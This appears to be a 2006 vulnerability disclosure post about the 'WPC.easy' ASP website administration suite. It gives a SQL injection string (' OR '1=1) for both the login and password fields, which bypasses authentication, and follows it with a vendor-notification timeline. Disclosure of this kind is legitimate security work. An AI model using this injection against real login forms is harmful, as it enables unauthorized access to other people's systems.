My first vulnerability report :)
"WPC.easy" is a database generated website with a dynamic on-line administration suite which allows for product updates, editing, deleting, image upload and price changes. "WPC.easy" is powered by a Secure Database.
"WPC.easy" is an interactive self maintained web site, developed with ASP technology. The web site has a secure, password protected dynamic administration interface.
Secure ?? Woops.. :)
"Thank You for using WPCeasy"
login: ' OR '1=1
password: ' OR '1=1
28 jan 2006: vulnerability found
29 jan 2006: vendor notified
30 Jan 2006: vendor responded
18 Feb 2006: still no fix, posted to buqtraq
Greetings to L0om for encouraging me to post this here and everyone at JIHS.